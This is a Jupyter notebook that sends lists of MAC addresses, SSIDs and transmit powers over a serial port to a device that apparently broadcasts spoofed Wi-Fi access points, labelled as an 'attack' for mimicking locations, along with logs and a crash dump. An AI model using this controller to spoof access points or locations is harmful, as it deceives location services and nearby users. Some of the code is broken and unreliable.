## Sending Data from a File

In [49]:
import serial
import json

port_name = "/dev/ttyUSB0"

#helper functions:
def getTxPower(rssi):
    if rssi > -60:
        return 84
    elif rssi > -70:
        return 44
    elif rssi > -85:
        return 8
    else:
        return 8

# Prepare data to send
file_path = "12-03/data4.json"
data = json.load(open(file_path, 'r'))[0]
macs = []
rssi = []
ssids = []
rssi = rssi[:15]
#convert to tx power values
tx = []
for i in range(len(rssi)):
    tx.append(getTxPower(rssi[i]))

# Open serial port
ser = serial.Serial(port_name, 115200)

# Read data from serial port
while True:
    data = ser.readline()
    data = data.decode("utf-8")

    if "Waiting for input" in data:
        print("connected")
        break
    else:    
        print(data)

#bake up the command string
print(f"sending {len(rssi)} values")
cmd = ""
for i in range(len(rssi)):
    cmd += macs[i] + ";" + str(tx[i]) + ";" + ssids[i] + ","
    print(f"{rssi[i]} -> {tx[i]}")

#send cmd to serial port
#cmd format: "mac;tx;ssid,mac;tx;ssid..."
print(cmd)
ser.write(cmd.encode("utf-8"))
print("sent")
try:
    while True:
        #if available, read data from serial port
        if ser.in_waiting > 0:
            data = ser.readline().decode("utf-8")
            print(data)
except Exception as e:
    print(e)
    ser.close()
    print("closed")


## Sending Data Manually

In [60]:
import serial
#Manually Send data to serial port
macs = ['34:8A:12:C9:22:8','34:8A:12:C9:22:24','34:8A:12:C9:22:44','34:8A:12:C9:22:64','34:8A:12:C9:22:84']
tx = ['8','24','44','64','84']
ssids = ['test1','test2','test3','test4','test5']

#open serial port
ser = serial.Serial('/dev/ttyUSB1', 115200)

#wait for connection
while True:
    if(ser.in_waiting > 0):
        data = ser.readline().decode("utf-8")
        print(data)
        if "Waiting for input" in data:
            print("connected")
            break

#bake up the command string
cmd = ""
for i in range(len(macs)):
    cmd += macs[i] + ";" + str(tx[i]) + ";" + ssids[i] + ","

#send cmd to serial port
ser.write(cmd.encode("utf-8"))
print("sent")

try:
    while True:
        #if available, read data from serial port
        if ser.in_waiting > 0:
            data = ser.readline().decode("utf-8")
            print(data)
except:
    ser.close()
    print("closed")

Power set to: 60

Setting power to: 84

Power set to: 78

Attack complete.Packets sent: 830

Setting power to: 8

Power set to: 8

Setting power to: 24

Power set to: 20

Setting power to: 44

Power set to: 44

Setting power to: 64

Power set to: 60

Setting power to: 84

Power set to: 78

Attack complete.Packets sent: 835

Setting power to: 8

Power set to: 8

Setting power to: 24

Power set to: 20

Setting power to: 44

Power set to: 44

Setting power to: 64

Power set to: 60

Setting power to: 84

Power set to: 78

Attack complete.Packets sent: 840

Setting power to: 8

Power set to: 8

Setting power to: 24

Power set to: 20

Setting power to: 44

Power set to: 44

Setting power to: 64

Power set to: 60

Setting power to: 84

Power set to: 78

Attack complete.Packets sent: 845

Setting power to: 8

Power set to: 8

Setting power to: 24

Power set to: 20

Setting power to: 44

Power set to: 44

Setting power to: 64

Power set to: 60

Setting power to: 84

Power set to: 78

Attack com

KeyboardInterrupt: 

## Programmable Attack

In [64]:
import serial
import json
import time

#program file = attack.json
file_path = "attack.json"
data = json.load(open(file_path, 'r'))

#open serial port
ser = serial.Serial('/dev/ttyUSB1', 115200)

#loop through each location
for i in range(len(data)):
    d = data[i] #location's mac,rssi,ssid data
    
    #cmd format: "mac;tx;ssid,mac;tx;ssid..."
    cmd = ""
    for j in range(10): #only use top 10
        t = json.loads(d[j])
        tx = getTxPower(t["RSSI"])
        cmd += t["MAC"] + ";" + str(tx) + ";" + t['SSID'] + ","

    #send cmd to serial port
    ser.write(cmd.encode("utf-8"))
    print("sent")

    time.sleep(10) #wait for 10 seconds

    #write 0x00 to serial port
    ser.write(bytes([0x00]))

#read serial
try:
    while True:
        if ser.in_waiting > 0:
            data = ser.readline().decode("utf-8")
            print(data)
except:
    ser.close()
    print("closed")



Waiting for input

 

0

 

 

0

 

 

0

 

 

0

 

 

0

 

 

0

 

 

0

 

 

0

 

 

0

 

 

0

 

 

0

 

 

0

 

 

0

 

 

0

 

 

0

 

 

0

 

 

0

 

 

0

 

 

0

 

 

0

 

 

0

 

 

0

 

 

0

 

 

0

 

 

0

 

 

0

 

 

0

 

 

0

 

 

0

 

 

0

 

 

0

 

 

0

 

 

0

 

 

0

 

 

0

 



0

 

 

0

 

 

0

 

 

0

 

 

0

 

 

0

 

 

0

 

 

0

 

 

0

 

 

0

 

 

0

 

 

0

 

 

0

 

 

0

 

Guru Meditation Error: Core  1 panic'ed (LoadProhibited). Exception was unhandled.



Core  1 register dump:

PC      : 0x4014c9e8  PS      : 0x00060d30  A0      : 0x800d4299  A1      : 0x3ffb21e0  

A2      : 0x3ffc3ce8  A3      : 0x81000000  A4      : 0x0000000e  A5      : 0x000000bf  

A6      : 0x00ff0000  A7      : 0xff000000  A8      : 0x00000081  A9      : 0x3ffb21c0  

A10     : 0x3ffc3ce8  A11     : 0x3ffc3cdc  A12     : 0x00000001  A13     : 0x0000ff00  

A14     : 0x00ff0000  A15     : 0xff000000  SAR     : 0x00000016  EXCC